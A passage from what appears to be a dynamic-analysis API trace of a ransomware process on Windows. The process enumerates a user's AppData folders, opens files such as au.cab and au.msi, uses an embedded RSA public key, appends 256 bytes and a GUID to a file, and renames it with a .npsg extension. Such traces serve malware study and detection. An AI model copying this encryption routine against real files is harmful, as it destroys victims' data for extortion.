returned="Internet Explorer\\" [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8d868 | out: hHeap=0x620000) returned 1 [0241.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0241.622] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0241.622] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0241.622] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0241.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0241.623] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0241.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fad8 [0241.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0241.623] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0241.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0241.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fad8 | out: hHeap=0x620000) returned 1 [0241.623] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0241.623] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0241.623] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0241.623] PathFindFileNameW (pszPath="") returned="" [0241.623] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393ba0 [0241.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0241.624] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3393ba0 | out: hHeap=0x620000) returned 1 [0241.624] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.624] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5616fca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x2bf7e690, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x2bf7e690, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0241.624] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0241.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0241.625] PeekMessageW (in: lpMsg=0x39aff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39aff08) returned 0 [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0241.625] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a088 [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0241.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\") returned="AU\\" [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a5d8 [0241.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c44b0 [0241.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0241.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c5148 [0241.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fad8 [0241.625] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0241.625] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0241.625] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0241.625] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0241.625] PathFindFileNameW (pszPath="") returned="" [0241.626] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0241.626] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7eea3160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0241.627] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x8e062, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.cab", cAlternateFileName="")) returned 1 [0241.627] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab") returned=".cab" [0241.627] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0241.628] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=581730) returned 1 [0241.628] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0241.630] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8e03c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.630] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0241.651] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x25805, lpOverlapped=0x0) returned 1 [0241.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.661] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0241.661] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a5d8) returned 1 [0241.662] CryptCreateHash (in: hProv=0x67a5d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0241.662] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0241.662] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0241.662] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0241.662] GetLastError () returned 0x0 [0241.662] CryptDestroyHash (hHash=0x33f0408) returned 1 [0241.662] CryptReleaseContext (hProv=0x67a5d8, dwFlags=0x0) returned 1 [0241.662] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0241.662] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0241.663] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0241.663] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0241.664] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8e062, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0241.664] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0241.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0241.665] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0241.665] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0241.665] CloseHandle (hObject=0x644) returned 1 [0242.045] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.cab.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.cab.npsg")) returned 1 [0242.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bcd0 | out: hHeap=0x620000) returned 1 [0242.046] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0242.046] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0242.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0242.048] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7eec92c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7eec92c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eec92c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x2d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="au.msi", cAlternateFileName="")) returned 1 [0242.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a5d8 [0242.048] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0242.048] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a5d8 | out: hHeap=0x620000) returned 1 [0242.048] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi") returned=".msi" [0242.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\AU\\au.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\au\\au.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0242.054] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=185344) returned 1 [0242.054] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0242.057] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x2d3da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0242.057] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0242.158] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0242.158] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x25805, lpOverlapped=0x0) returned 1 [0242.173] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.173] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0242.173] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.173] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0242.173] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a5d8) returned 1 [0242.175] CryptCreateHash (in: hProv=0x67a5d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0242.175] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0242.175] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0242.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0242.175] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0242.175] GetLastError () returned 0x0 [0242.175] CryptDestroyHash (hHash=0x33f0408) returned 1 [0242.175] CryptReleaseContext (hProv=0x67a5d8, dwFlags=0x0) returned 1 [0242.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0242.176] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0242.176] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0242.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0242.176] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0242.176] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0242.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0242.176] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25810) returned 0x3b95d50 [0242.177] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0242.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0242.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0242.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0242.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fb20 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f88 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fb68 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fa0 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fd0 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89030 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fe8 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0242.178] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0242.178] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0242.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fd0 | out: hHeap=0x620000) returned 1 [0242.178] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0242.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89030 | out: hHeap=0x620000) returned 1 [0242.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0242.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89030 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fe8 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88fd0 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0242.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0242.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0242.180] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 